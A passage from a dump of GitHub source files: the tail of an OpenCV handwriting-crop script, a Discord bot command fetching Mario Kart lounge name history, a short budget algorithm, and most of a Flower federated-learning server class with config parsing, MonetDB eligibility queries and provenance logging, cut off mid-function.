100):\n\t\t\tbreak\n\t\tif(a==0 and b!=0):\n\t\t\tcount += 1\n\t\telif(a!=0):\n\t\t\tb = 1\n#\tprint(type(a))\n\tp = img[:, :j+1]\n\tq = img[:, j+1:]\n\tnew_a.append(p)\n\t\n\tif(q.all()!=None):\n\t\ttry:\n\t\t\t\n\t\t\tcv2.imwrite('znew2.png', q)\n\t\texcept:\n\t\t\tprint(tracker)\n\t\t\tbreak\n\tcv2.imwrite('mid'+str(tracker)+'.png',q)\t\n\t#\tprint(np.shape(gray))\n#\tcv2.imwrite('znew1.png', p)\n\n#\tcv2.imwrite('znew2.png', q)\n\n#cv2.imshow(\"Cropped\", new_a[1]) # Show it\n#cv2.waitKey(0)\n\n\t\n###############################################################################\n\nfor i in range(len(new_a)):\n\ttry:\n\t\timg = new_a[i] # Read in the image and convert to grayscale\n\t\tgray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\t\tgray = 255*(gray < 128).astype(np.uint8) # To invert the text to white\n\t\tcoords = cv2.findNonZero(gray) # Find all non-zero points (text)\n\n\n\t\tx, y, w, h = cv2.boundingRect(coords) # Find minimum spanning bounding box\n\t\trect = img[y:y+h, x:x+w] # Crop the image - note we do this on the original image\n\t\t#cv2.imshow(\"Cropped\", rect) # Show it\n\t\t#cv2.waitKey(0)\n\t\tcv2.destroyAllWindows()\n\t\tcv2.imwrite(\"new\"+str(i)+\".png\", rect) # Save the image\n\texcept:\n\t\tbreak\n","repo_name":"VatsalLalcheta/HandWrittenText-Recognition-From-Form","sub_path":"HWTR/a/check/final_pre_process.py","file_name":"final_pre_process.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"15369713876","text":"import discord\nimport aiohttp\nimport re\n\nfrom discord import app_commands\nfrom autocomplete import name_autocomplete\nfrom utils import lounge_data\nfrom datetime import datetime, timedelta\n\n\n@app_commands.command()\n@app_commands.autocomplete(player=name_autocomplete)\n@app_commands.describe(player=\"The player you want to check lounge name history from\")\nasync def name_history(interaction: discord.Interaction, player: str = None):\n \"\"\"lounge name history of a player\"\"\"\n\n embed = discord.Embed(color=0x47e0ff, title=\"name history\")\n\n if not player:\n async with aiohttp.ClientSession() as session:\n async with session.get(\"https://www.mk8dx-lounge.com/api/player?discordId=\"+str(interaction.user.id)) as response:\n if response.status == 200:\n user_data = await response.json()\n player = user_data['name']\n else:\n return await interaction.response.send_message(content=\"could not found your account in the lounge\", ephemeral=True)\n\n async with aiohttp.ClientSession() as session:\n async with session.get(\"https://www.mk8dx-lounge.com/api/player/details?name=\"+player) as response:\n if response.status == 200:\n data = await response.json()\n\n next_change = round(datetime.fromisoformat(data['nameHistory'][0]['changedOn']).timestamp() + timedelta(days=60).total_seconds())\n embed.add_field(name=\"next change\", value=f\" \", inline=False)\n\n name_history_string = \"\"\n for change in data['nameHistory']:\n name_history_string += f\": {change['name']}\\n\"\n\n embed.add_field(name=\"name change\", value=name_history_string, inline=False)\n\n else:\n embed.description = \"player not found\"\n\n await interaction.response.send_message(embed=embed)\n\n\nasync def setup(bot):\n bot.tree.add_command(name_history)\n","repo_name":"prismillon/Quaxly","sub_path":"cogs/name_history.py","file_name":"name_history.py","file_ext":"py","file_size_in_byte":2070,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"12334915062","text":"'''\n예산\nhttps://programmers.co.kr/learn/courses/30/lessons/12982\n'''\n\ndef solution(d, budget):\n d.sort()\n for i in range(len(d), -1, -1):\n if sum(d[:i]) <= budget:\n return i\n return 0\n\nprint(solution([1,3,2,5,4], 9))","repo_name":"lastosellie/algorithm","sub_path":"Programmers/12982.py","file_name":"12982.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43808705916","text":"from argparse import ArgumentParser\nfrom configparser import ConfigParser\nfrom flwr.common import Metrics, NDArrays, Parameters\nfrom flwr.server import Server, ServerConfig, SimpleClientManager, start_server\nfrom flwr.server.strategy import FedAvg, FedAvgM, Strategy\nfrom logging import FileHandler, Formatter, getLevelName, Logger, StreamHandler\nfrom pathlib import Path\nfrom pymonetdb import connect\nfrom random import choice\nfrom re import findall\nfrom time import perf_counter\nfrom typing import Any, List, Optional, Tuple\n\nfrom dfa_lib_python.dataflow import Dataflow\nfrom dfa_lib_python.transformation import Transformation\nfrom dfa_lib_python.attribute import Attribute\nfrom dfa_lib_python.attribute_type import AttributeType\nfrom dfa_lib_python.set import Set\nfrom dfa_lib_python.set_type import SetType\nfrom dfa_lib_python.task import Task\nfrom dfa_lib_python.dataset import DataSet\nfrom dfa_lib_python.element import Element\nfrom dfa_lib_python.task_status import TaskStatus\nfrom dfa_lib_python.extractor_extension import ExtractorExtension\nfrom dfa_lib_python.dependency import Dependency\nimport time\nimport pymonetdb\n\n\ndataflow_tag = \"flower-df\"\n\n\nclass FlowerServer:\n def __init__(self, server_id: int, server_config_file: Path) -> None:\n # Server's ID and Config File.\n self.server_id = server_id\n self.server_config_file = server_config_file\n # Server's Config File Settings.\n self.general_settings = None\n self.logging_settings = None\n self.fl_settings = None\n self.ssl_settings = None\n self.grpc_settings = None\n self.training_hyper_parameters_settings = None\n self.testing_hyper_parameters_settings = None\n self.hyper_parameters_dynamic_adjustment_settings = None\n self.adjustments_policies_settings = None\n self.training_hyper_parameters_dynamic_adjustment_settings = None\n self.testing_hyper_parameters_dynamic_adjustment_settings = None\n self.monetdb_settings = None\n # Other Attributes.\n self.logger = None\n self.flower_server = None\n self.flower_server_config = None\n self.fl_round = None\n self.fit_config = None\n self.evaluate_config = None\n self.initial_global_model_parameters = None\n self.global_model_parameters = None\n\n @staticmethod\n def parse_config_section(config_parser: ConfigParser, section_name: str) -> dict:\n parsed_section = {\n key: value for key, value in config_parser[section_name].items()\n }\n for key, value in parsed_section.items():\n if value == \"None\":\n parsed_section[key] = None\n elif value in [\"True\", \"Yes\"]:\n parsed_section[key] = True\n elif value in [\"False\", \"No\"]:\n parsed_section[key] = False\n elif value.isdigit():\n parsed_section[key] = int(value)\n elif value.replace(\".\", \"\", 1).isdigit():\n parsed_section[key] = float(value)\n elif not findall(r\"%\\(.*?\\)s+\", value) and findall(r\"\\[.*?]+\", value):\n aux_list = (\n value.replace(\"[\", \"\").replace(\"]\", \"\").replace(\" \", \"\").split(\",\")\n )\n for index, item in enumerate(aux_list):\n if item.isdigit():\n aux_list[index] = int(item)\n elif item.replace(\".\", \"\", 1).isdigit():\n aux_list[index] = float(item)\n parsed_section[key] = aux_list\n elif not findall(r\"%\\(.*?\\)s+\", value) and findall(r\"\\(.*?\\)+\", value):\n aux_list = (\n value.replace(\"(\", \"\").replace(\")\", \"\").replace(\" \", \"\").split(\",\")\n )\n for index, item in enumerate(aux_list):\n if item.isdigit():\n aux_list[index] = int(item)\n elif item.replace(\".\", \"\", 1).isdigit():\n aux_list[index] = float(item)\n parsed_section[key] = tuple(aux_list)\n elif not findall(r\"%\\(.*?\\)s+\", value) and findall(r\"\\{.*?}+\", value):\n aux_dict = {}\n aux_list = (\n value.replace(\"{\", \"\").replace(\"}\", \"\").replace(\" \", \"\").split(\",\")\n )\n for item in aux_list:\n pair_item = item.split(\":\")\n pair_key = pair_item[0]\n pair_value = pair_item[1]\n if pair_value == \"None\":\n pair_value = None\n elif pair_value in [\"True\", \"Yes\"]:\n pair_value = True\n elif pair_value in [\"False\", \"No\"]:\n pair_value = False\n elif pair_value.isdigit():\n pair_value = int(value)\n elif pair_value.replace(\".\", \"\", 1).isdigit():\n pair_value = float(value)\n aux_dict.update({pair_key: pair_value})\n parsed_section[key] = aux_dict\n return parsed_section\n\n def set_attribute(self, attribute_name: str, attribute_value: Any) -> None:\n setattr(self, attribute_name, attribute_value)\n\n def get_attribute(self, attribute_name: str) -> Any:\n return getattr(self, attribute_name)\n\n def parse_flower_server_config_file(self) -> None:\n # Get Server's Config File.\n server_config_file = self.get_attribute(\"server_config_file\")\n # Init ConfigParser Object.\n cp = ConfigParser()\n cp.optionxform = str\n cp.read(filenames=server_config_file, encoding=\"utf-8\")\n # Parse 'General Settings' and Set Attributes.\n general_settings = self.parse_config_section(cp, \"General Settings\")\n self.set_attribute(\"general_settings\", general_settings)\n # If Logging is Enabled...\n if general_settings[\"enable_logging\"]:\n # Parse 'Logging Settings' and Set Attributes.\n logging_settings = self.parse_config_section(cp, \"Logging Settings\")\n self.set_attribute(\"logging_settings\", logging_settings)\n # Parse 'FL Settings' and Set Attributes.\n fl_settings = self.parse_config_section(cp, \"FL Settings\")\n\n attributes = [\n \"num_rounds\",\n \"round_timeout_in_seconds\",\n \"accept_rounds_containing_failures\",\n \"enable_ssl\",\n \"enable_dynamic_adjustment\",\n \"server_aggregation_strategy\",\n \"fraction_fit\",\n \"fraction_evaluate\",\n \"min_fit_clients\",\n \"min_evaluate_clients\",\n \"min_available_clients\",\n ]\n to_dfanalyzer = [fl_settings.get(attr, None) for attr in attributes]\n t1 = Task(1, dataflow_tag, \"ServerConfig\")\n\n t1.begin()\n\n self.set_attribute(\"fl_settings\", fl_settings)\n\n # If SSL is Enabled...\n if fl_settings[\"enable_ssl\"]:\n # Parse 'SSL Settings' and Set Attributes.\n ssl_settings = self.parse_config_section(cp, \"SSL Settings\")\n self.set_attribute(\"ssl_settings\", ssl_settings)\n # Parse 'gRPC Settings' and Set Attributes.\n grpc_settings = self.parse_config_section(cp, \"gRPC Settings\")\n self.set_attribute(\"grpc_settings\", grpc_settings)\n\n t1_input = DataSet(\n \"iServerConfig\",\n [\n Element(\n [\n self.server_id,\n str(grpc_settings[\"grpc_listen_ip_address\"])\n + str(grpc_settings[\"grpc_listen_port\"]),\n grpc_settings[\"grpc_max_message_length_in_bytes\"],\n ]\n + to_dfanalyzer\n )\n ],\n )\n t1.add_dataset(t1_input)\n t1_output = DataSet(\"oServerConfig\", [Element([])])\n t1.add_dataset(t1_output)\n t1.end()\n # Parse 'Training Hyper-parameters Settings' and Set Attributes.\n training_hyper_parameters_settings = self.parse_config_section(\n cp, \"Training Hyper-parameters Settings\"\n )\n self.set_attribute(\n \"training_hyper_parameters_settings\", training_hyper_parameters_settings\n )\n # Parse 'Testing Hyper-parameters Settings' and Set Attributes.\n testing_hyper_parameters_settings = self.parse_config_section(\n cp, \"Testing Hyper-parameters Settings\"\n )\n self.set_attribute(\n \"testing_hyper_parameters_settings\", testing_hyper_parameters_settings\n )\n # If Dynamic Adjustment of Hyper-parameters is Enabled...\n if fl_settings[\"enable_hyper_parameters_dynamic_adjustment\"]:\n # Parse 'Hyper-parameters Dynamic Adjustment Settings' and Set Attributes.\n hyper_parameters_dynamic_adjustment_settings = self.parse_config_section(\n cp, \"Hyper-parameters Dynamic Adjustment Settings\"\n )\n self.set_attribute(\n \"hyper_parameters_dynamic_adjustment_settings\",\n hyper_parameters_dynamic_adjustment_settings,\n )\n # Parse 'Adjustments Policies Settings' and Set Attributes.\n adjustments_policies_settings = self.parse_config_section(\n cp, \"Adjustments Policies Settings\"\n )\n self.set_attribute(\n \"adjustments_policies_settings\", adjustments_policies_settings\n )\n # If Dynamic Adjustment of Training Hyper-parameters is Enabled...\n if hyper_parameters_dynamic_adjustment_settings[\n \"dynamically_adjust_training_hyper_parameters\"\n ]:\n # Parse 'Training Hyper-parameters Dynamic Adjustment Settings' and Set Attributes.\n training_hyper_parameters_dynamic_adjustment_settings = (\n self.parse_config_section(\n cp, \"Training Hyper-parameters Dynamic Adjustment Settings\"\n )\n )\n self.set_attribute(\n \"training_hyper_parameters_dynamic_adjustment_settings\",\n training_hyper_parameters_dynamic_adjustment_settings,\n )\n # If Dynamic Adjustment of Testing Hyper-parameters is Enabled...\n if hyper_parameters_dynamic_adjustment_settings[\n \"dynamically_adjust_testing_hyper_parameters\"\n ]:\n # Parse 'Testing Hyper-parameters Dynamic Adjustment Settings' and Set Attributes.\n testing_hyper_parameters_dynamic_adjustment_settings = (\n self.parse_config_section(\n cp, \"Testing Hyper-parameters Dynamic Adjustment Settings\"\n )\n )\n self.set_attribute(\n \"testing_hyper_parameters_dynamic_adjustment_settings\",\n testing_hyper_parameters_dynamic_adjustment_settings,\n )\n # If MonetDB is the Hyper-parameters Adjustments Eligibility Controller...\n if (\n hyper_parameters_dynamic_adjustment_settings[\n \"adjustments_eligibility_controller\"\n ]\n == \"MonetDB\"\n ):\n\n ###########################\n # -------- MODIFIED --------\n # Parse 'MonetDB Settings' and Set Attributes.\n monetdb_settings = cp[\"MonetDB Settings\"]\n self.set_attribute(\"monetdb_settings\", monetdb_settings)\n ###########################\n\n # Unbind ConfigParser Object (Garbage Collector).\n del cp\n\n def load_logger(self) -> Optional[Logger]:\n logger = None\n general_settings = self.get_attribute(\"general_settings\")\n if general_settings[\"enable_logging\"]:\n logger_name = \"FlowerServer_\" + str(self.get_attribute(\"server_id\"))\n logging_settings = self.get_attribute(\"logging_settings\")\n logger = Logger(name=logger_name, level=logging_settings[\"level\"])\n formatter = Formatter(\n fmt=logging_settings[\"format\"], datefmt=logging_settings[\"date_format\"]\n )\n if logging_settings[\"log_to_file\"]:\n file_parents_path = findall(\"(.*/)\", logging_settings[\"file_name\"])\n if file_parents_path:\n Path(file_parents_path[0]).mkdir(parents=True, exist_ok=True)\n file_handler = FileHandler(\n filename=logging_settings[\"file_name\"],\n mode=logging_settings[\"file_mode\"],\n encoding=logging_settings[\"encoding\"],\n )\n file_handler.setLevel(logger.getEffectiveLevel())\n file_handler.setFormatter(formatter)\n logger.addHandler(file_handler)\n if logging_settings[\"log_to_console\"]:\n console_handler = StreamHandler()\n console_handler.setLevel(logger.getEffectiveLevel())\n console_handler.setFormatter(formatter)\n logger.addHandler(console_handler)\n return logger\n\n def log_message(self, message: str, message_level: str) -> None:\n logger = self.get_attribute(\"logger\")\n if logger and getLevelName(logger.getEffectiveLevel()) != \"NOTSET\":\n if message_level == \"DEBUG\":\n logger.debug(msg=message)\n elif message_level == \"INFO\":\n logger.info(msg=message)\n elif message_level == \"WARNING\":\n logger.warning(msg=message)\n elif message_level == \"ERROR\":\n logger.error(msg=message)\n elif message_level == \"CRITICAL\":\n logger.critical(msg=message)\n\n @staticmethod\n def load_initial_global_model_parameters() -> Optional[Parameters]:\n \"\"\"Server-side parameter initialization. A powerful mechanism which can be used, for example:\n \\n - To resume the training from a previously saved checkpoint;\n \\n - To implement hybrid approaches, such as to fine-tune a pre-trained model using federated learning.\n \\n If no parameters are returned, the server will randomly select one client and ask its parameters.\"\"\"\n # TODO: To Implement (If Ever Needed)...\n return None\n\n def load_initial_fit_config(self) -> dict:\n training_hyper_parameters_settings = self.get_attribute(\n \"training_hyper_parameters_settings\"\n )\n fit_config = {\"fl_round\": 0}\n fit_config.update(training_hyper_parameters_settings)\n # Log the Initial Training Configuration (If Logger is Enabled for \"DEBUG\" Level).\n message = \"[Server {0} | FL Round {1}] Initial Fit Config: {2}\".format(\n self.get_attribute(\"server_id\"), fit_config[\"fl_round\"], fit_config\n )\n self.log_message(message, \"DEBUG\")\n return fit_config\n\n def load_initial_evaluate_config(self) -> dict:\n testing_hyper_parameters_settings = self.get_attribute(\n \"testing_hyper_parameters_settings\"\n )\n evaluate_config = {\"fl_round\": 0}\n evaluate_config.update(testing_hyper_parameters_settings)\n # Log the Initial Testing Configuration (If Logger is Enabled for \"DEBUG\" Level).\n message = \"[Server {0} | FL Round {1}] Initial Evaluate Config: {2}\".format(\n self.get_attribute(\"server_id\"),\n evaluate_config[\"fl_round\"],\n evaluate_config,\n )\n self.log_message(message, \"DEBUG\")\n return evaluate_config\n\n def get_grpc_listen_ip_address_and_port(self) -> str:\n grpc_settings = self.get_attribute(\"grpc_settings\")\n return (\n grpc_settings[\"grpc_listen_ip_address\"]\n + \":\"\n + str(grpc_settings[\"grpc_listen_port\"])\n )\n\n def get_grpc_max_message_length_in_bytes(self) -> int:\n return self.get_attribute(\"grpc_settings\")[\"grpc_max_message_length_in_bytes\"]\n\n @staticmethod\n def instantiate_simple_client_manager() -> SimpleClientManager:\n return SimpleClientManager()\n\n @staticmethod\n def evaluate_fn(\n fl_round: int, global_model_parameters: NDArrays, evaluate_config: dict\n ) -> Optional[Metrics]:\n \"\"\"Server-side (Centralized) evaluation function called by Flower after every training round.\n \\nRequires a server-side dataset to evaluate the newly aggregated model without sending it to the Clients.\n \\nThe 'losses_centralized' and 'metrics_centralized' will only contain values using this centralized evaluation.\n \\nAlternative: Client-side (Federated) evaluation.\"\"\"\n # TODO: To Implement (If Ever Needed)...\n return None\n\n def is_enabled_hyper_parameters_dynamic_adjustment(self, phase: str) -> bool:\n hyper_parameters_dynamic_adjustment_settings = self.get_attribute(\n \"hyper_parameters_dynamic_adjustment_settings\"\n )\n if hyper_parameters_dynamic_adjustment_settings:\n if phase == \"train\":\n return hyper_parameters_dynamic_adjustment_settings[\n \"dynamically_adjust_training_hyper_parameters\"\n ]\n elif phase == \"test\":\n return hyper_parameters_dynamic_adjustment_settings[\n \"dynamically_adjust_testing_hyper_parameters\"\n ]\n return False\n\n def execute_random_eligibility(self, phase: str) -> bool:\n random_eligibility_start = perf_counter()\n is_fl_round_eligible = choice([True, False])\n random_eligibility_end = perf_counter() - random_eligibility_start\n message = \"[Server {0}] Finished Executing the Random Eligibility ({1}ing Phase) in {2} Seconds.\".format(\n self.get_attribute(\"server_id\"), phase.capitalize(), random_eligibility_end\n )\n self.log_message(message, \"INFO\")\n return is_fl_round_eligible\n\n def execute_monetdb_eligibility_query(self, phase: str) -> bool:\n monetdb_eligibility_query_start = perf_counter()\n monetdb_settings = self.get_attribute(\"monetdb_settings\")\n adjustments_eligibility_query = None\n if phase == \"train\":\n adjustments_eligibility_query = monetdb_settings[\n \"training_adjustments_eligibility_query\"\n ]\n elif phase == \"test\":\n adjustments_eligibility_query = monetdb_settings[\n \"testing_adjustments_eligibility_query\"\n ]\n if adjustments_eligibility_query is None:\n return False\n\n connection = connect(\n hostname=monetdb_settings[\"hostname\"],\n port=monetdb_settings[\"port\"],\n username=monetdb_settings[\"username\"],\n password=monetdb_settings[\"password\"],\n database=monetdb_settings[\"database\"],\n )\n\n cursor = connection.cursor()\n\n result = None\n tries = 0\n fl_round = self.get_attribute(\"fl_round\")\n while tries < 100 and not result:\n cursor.execute(\n monetdb_settings[\"check_if_last_round_is_already_recorded\"].format(\n fl_round\n )\n )\n connection.commit()\n result = cursor.fetchone()\n\n if result:\n result = result[-1]\n tries += 1\n time.sleep(0.05)\n\n if result:\n cursor.execute(operation=adjustments_eligibility_query.format(fl_round))\n query_result = int(cursor.fetchone()[0])\n else:\n query_result = 0\n cursor.close()\n connection.close()\n is_fl_round_eligible = True if query_result == 1 else False\n monetdb_eligibility_query_end = perf_counter() - monetdb_eligibility_query_start\n message = \"[Server {0}] Finished Executing the MonetDB Eligibility Query ({1}ing Phase) in {2} Seconds.\".format(\n self.get_attribute(\"server_id\"),\n phase.capitalize(),\n monetdb_eligibility_query_end,\n )\n self.log_message(message, \"INFO\")\n return is_fl_round_eligible\n\n def is_fl_round_eligible_for_hyper_parameters_dynamic_adjustment(\n self, phase: str\n ) -> bool:\n hyper_parameters_dynamic_adjustment_settings = self.get_attribute(\n \"hyper_parameters_dynamic_adjustment_settings\"\n )\n initial_round_candidate_for_adjustments = (\n hyper_parameters_dynamic_adjustment_settings[\n \"initial_round_candidate_for_adjustments\"\n ]\n )\n fl_round = self.get_attribute(\"fl_round\")\n if fl_round < initial_round_candidate_for_adjustments:\n return False\n adjustments_eligibility_controller = (\n hyper_parameters_dynamic_adjustment_settings[\n \"adjustments_eligibility_controller\"\n ]\n )\n if adjustments_eligibility_controller == \"Random\":\n return self.execute_random_eligibility(phase)\n if adjustments_eligibility_controller == \"MonetDB\":\n return self.execute_monetdb_eligibility_query(phase)\n\n def adjust_hyper_parameter_value(\n self, old_value: Any, adjustment_policy: str\n ) -> Any:\n adjusted_value = None\n adjustment_operation_text = self.get_attribute(\"adjustments_policies_settings\")[\n adjustment_policy\n ]\n if \"boolean\" in adjustment_policy:\n if adjustment_operation_text == \"Flip\":\n adjusted_value = not old_value\n elif \"numerical\" in adjustment_policy:\n factor = findall(r\"[-+]?\\d*\\.?\\d+|[-+]?\\d+\", adjustment_operation_text)[0]\n if factor.isdigit():\n factor = int(factor)\n elif factor.replace(\".\", \"\", 1).isdigit():\n factor = float(factor)\n operation_text = \" \".join(findall(r\"[a-zA-Z]+\", adjustment_operation_text))\n if operation_text == \"Increment by\":\n adjusted_value = old_value + factor\n elif operation_text == \"Decrement by\":\n adjusted_value = old_value - factor\n elif operation_text == \"Multiply by\":\n adjusted_value = old_value * factor\n elif operation_text == \"Divide by\":\n adjusted_value = old_value / factor\n\n if type(old_value) == int:\n adjusted_value = int(adjusted_value)\n\n return adjusted_value\n\n def dynamically_adjust_hyper_parameters(self, phase: str, config: dict) -> dict:\n config_name = None\n hyper_parameters_to_adjust = None\n if phase == \"train\":\n config_name = \"Fit Config\"\n hyper_parameters_to_adjust = self.get_attribute(\n \"training_hyper_parameters_dynamic_adjustment_settings\"\n )[\"to_adjust\"]\n elif phase == \"test\":\n config_name = \"Evaluate Config\"\n hyper_parameters_to_adjust = self.get_attribute(\n \"testing_hyper_parameters_dynamic_adjustment_settings\"\n )[\"to_adjust\"]\n adjustments_policies_settings = self.get_attribute(\n \"adjustments_policies_settings\"\n )\n if hyper_parameters_to_adjust:\n for (\n hyper_parameter,\n adjustment_policy,\n ) in hyper_parameters_to_adjust.items():\n if (\n hyper_parameter in config\n and adjustment_policy in adjustments_policies_settings\n ):\n hyper_parameter_old_value = config[hyper_parameter]\n hyper_parameter_new_value = self.adjust_hyper_parameter_value(\n hyper_parameter_old_value, adjustment_policy\n )\n config.update({hyper_parameter: hyper_parameter_new_value})\n # Log the Dynamic Configuration Adjustment Notice (If Logger is Enabled for \"INFO\" Level).\n message = \"[Server {0} | FL Round {1}] {2} Dynamically Adjusted (Eligible FL Round).\".format(\n self.get_attribute(\"server_id\"),\n self.get_attribute(\"fl_round\"),\n config_name,\n )\n self.log_message(message, \"INFO\")\n return config\n\n def on_fit_config_fn(self, fl_round: int) -> Optional[dict]:\n \"\"\"Training configuration function called by Flower before each training round.\"\"\"\n # Update the Current FL Round (Necessary Workaround on Flower v1.1.0).\n starting_time = time.ctime()\n\n self.set_attribute(\"fl_round\", fl_round)\n # Log the Current FL Round (If Logger is Enabled for \"INFO\" Level).\n message = \"[Server {0}] Current FL Round: {1}\".format(\n self.get_attribute(\"server_id\"), self.get_attribute(\"fl_round\")\n )\n self.log_message(message, \"INFO\")\n # Get the Training Configuration.\n fit_config = self.get_attribute(\"fit_config\")\n # Update the Training Configuration's Current FL Round.\n fit_config.update({\"fl_round\": self.get_attribute(\"fl_round\")})\n # Dynamically Adjust the Training Configuration's Hyper-parameters (If Enabled and Eligible).\n dynamically_adjusted = False\n if self.is_enabled_hyper_parameters_dynamic_adjustment(\"train\"):\n if self.is_fl_round_eligible_for_hyper_parameters_dynamic_adjustment(\n \"train\"\n ):\n fit_config = self.dynamically_adjust_hyper_parameters(\n \"train\", fit_config\n )\n dynamically_adjusted = True\n\n # Store the Training Configuration Changes.\n self.set_attribute(\"fit_config\", fit_config)\n # Log the Training Configuration (If Logger is Enabled for \"DEBUG\" Level).\n message = \"[Server {0} | FL Round {1}] Fit Config: {2}\".format(\n self.get_attribute(\"server_id\"), fit_config[\"fl_round\"], fit_config\n )\n self.log_message(message, \"DEBUG\")\n # Replace All Values of None Type to \"None\" String (Necessary Workaround on Flower v1.1.0).\n fit_config = {k: (\"None\" if v is None else v) for k, v in fit_config.items()}\n\n t7 = Task(7 + 6 * (fl_round - 1), dataflow_tag, \"TrainingConfig\")\n if fl_round == 1:\n t7.add_dependency(\n Dependency(\n [\"serverconfig\", \"strategy\", \"serverevaluationaggregation\"],\n [\"1\", \"2\", \"0\"],\n )\n )\n else:\n t7.add_dependency(\n Dependency(\n [\"serverconfig\", \"strategy\", \"serverevaluationaggregation\"],\n [\"1\", \"2\", str(12 + 6 * (fl_round - 2))],\n )\n )\n\n t7.begin()\n\n attributes = [\n \"shuffle\",\n \"batch_size\",\n \"initial_epoch\",\n \"epochs\",\n \"steps_per_epoch\",\n \"validation_split\",\n \"validation_batch_size\",\n ]\n\n to_dfanalyzer = [\n fl_round,\n starting_time,\n time.ctime(),\n ] + [fit_config.get(attr, 0) for attr in attributes]\n\n t7_input = DataSet(\"iTrainingConfig\", [Element(to_dfanalyzer)])\n t7.add_dataset(t7_input)\n t7_output = DataSet(\n \"oTrainingConfig\",\n [Element([fl_round, dynamically_adjusted])],\n )\n t7.add_dataset(t7_output)\n t7.end()\n\n # Return the Training Configuration to be Sent to All Participating Clients.\n return fit_config\n\n def on_evaluate_config_fn(self, fl_round: int) -> Optional[dict]:\n \"\"\"Testing configuration function called by Flower before each testing round.\"\"\"\n # Update the Current FL Round (Necessary Workaround on Flower v1.1.0).\n self.set_attribute(\"fl_round\", fl_round)\n # Log the Current FL Round (If Logger is Enabled for \"INFO\" Level).\n message = \"[Server {0}] Current FL Round: {1}\".format(\n self.get_attribute(\"server_id\"), self.get_attribute(\"fl_round\")\n )\n self.log_message(message, \"INFO\")\n # Get the Testing Configuration.\n evaluate_config = self.get_attribute(\"evaluate_config\")\n # Update the Testing Configuration's Current FL Round.\n evaluate_config.update({\"fl_round\": self.get_attribute(\"fl_round\")})\n # Dynamically Adjust the Testing Configuration's Hyper-parameters (If Enabled and Eligible).\n if self.is_enabled_hyper_parameters_dynamic_adjustment(\"test\"):\n if self.is_fl_round_eligible_for_hyper_parameters_dynamic_adjustment(\n \"test\"\n ):\n evaluate_config = self.dynamically_adjust_hyper_parameters(\n \"test\", evaluate_config\n )\n # Store the Testing Configuration Changes.\n self.set_attribute(\"evaluate_config\", evaluate_config)\n # Log the Testing Configuration (If Logger is Enabled for \"DEBUG\" Level).\n message = \"[Server {0} | FL Round {1}] Evaluate Config: {2}\".format(\n self.get_attribute(\"server_id\"),\n evaluate_config[\"fl_round\"],\n evaluate_config,\n )\n self.log_message(message, \"DEBUG\")\n # Replace All Values of None Type to \"None\" String (Necessary Workaround on Flower v1.1.0).\n evaluate_config = {\n k: (\"None\" if v is None else v) for k, v in evaluate_config.items()\n }\n # Return the Testing Configuration to be Sent to All Participating Clients.\n\n t10 = Task(\n 10 + 6 * (fl_round - 1),\n dataflow_tag,\n \"EvaluationConfig\",\n dependency=Task(\n 9 + 6 * (fl_round - 1), dataflow_tag, \"ServerTrainingAggregation\"\n ),\n )\n t10.begin()\n attributes = [\"batch_size\", \"steps\"]\n to_dfanalyzer = [evaluate_config.get(attr, 0) for attr in attributes]\n\n t10_input = DataSet(\"iEvaluationConfig\", [Element(to_dfanalyzer)])\n t10.add_dataset(t10_input)\n t10_output = DataSet(\"oEvaluationConfig\", [Element([])])\n t10.add_dataset(t10_output)\n t10.end()\n\n # Return the Testing Configuration to be Sent to All Participating Clients.\n return evaluate_config\n\n def fit_metrics_aggregation_fn(\n self, training_metrics: List[Tuple[int, Metrics]]\n ) -> Optional[Metrics]:\n \"\"\"Metrics aggregation function called by Flower after every training round.\"\"\"\n t9 = Task(\n 9 + 6 * (self.get_attribute(\"fl_round\") - 1),\n dataflow_tag,\n \"ServerTrainingAggregation\",\n dependency=Task(\n 8 + 6 * (self.get_attribute(\"fl_round\") - 1),\n dataflow_tag,\n \"ClientTraining\",\n ),\n )\n starting_time = time.ctime()\n t9.begin()\n\n # Get the Total Number of Participating Clients.\n total_num_clients = len(training_metrics)\n # Get the Training Metrics Names.\n metrics_names_list = list(training_metrics[0][1].keys())\n # Multiply Each Training Metrics Value of Each Participating Client\n # By His Number of Training Examples (Client's Contribution).\n metrics_products_list = []\n for metric_name in metrics_names_list:\n metric_product = [\n num_examples * metric[metric_name]\n for num_examples, metric in training_metrics\n ]\n metrics_products_list.append(metric_product)\n # Get the Total Number of Training Examples (of All Participating Clients).\n total_num_examples = sum([num_examples for num_examples, _ in training_metrics])\n # Aggregate the Training Metrics (Weighted Average).\n aggregated_metrics = {}\n for metric_index in range(0, len(metrics_names_list)):\n metric_name = metrics_names_list[metric_index]\n weighted_average_metric = (\n sum(metrics_products_list[metric_index]) / total_num_examples\n )\n aggregated_metrics[metric_name] = weighted_average_metric\n\n # Log the Aggregated Training Metrics (If Logger is Enabled for \"INFO\" Level).\n message = \"[Server {0} | FL Round {1} | {2}] Aggregated Training Metrics (Weighted Average): {3}\".format(\n self.get_attribute(\"server_id\"),\n self.get_attribute(\"fl_round\"),\n \"\".join(\n [\n str(total_num_clients),\n \" Clients\" if total_num_clients > 1 else \" Client\",\n ]\n ),\n aggregated_metrics,\n )\n self.log_message(message, \"INFO\")\n\n to_dfanalyzer = [\n self.get_attribute(\"fl_round\"),\n total_num_clients,\n total_num_examples,\n aggregated_metrics[\"sparse_categorical_accuracy\"],\n aggregated_metrics[\"loss\"],\n aggregated_metrics[\"val_sparse_categorical_accuracy\"],\n aggregated_metrics[\"val_loss\"],\n aggregated_metrics[\"fit_time\"],\n starting_time,\n time.ctime(),\n ]\n t9_output = DataSet(\"oServerTrainingAggregation\", [Element(to_dfanalyzer)])\n t9.add_dataset(t9_output)\n t9.end()\n # Return the Aggregated Training Metrics.\n return aggregated_metrics\n\n def evaluate_metrics_aggregation_fn(\n self, testing_metrics: List[Tuple[int, Metrics]]\n ) -> Optional[Metrics]:\n \"\"\"Metrics aggregation function called by Flower after every testing round.\"\"\"\n # Get the Total Number of Participating Clients.\n t12 = Task(\n 12 + 6 * (self.get_attribute(\"fl_round\") - 1),\n dataflow_tag,\n \"ServerEvaluationAggregation\",\n dependency=Task(\n 11 + 6 * 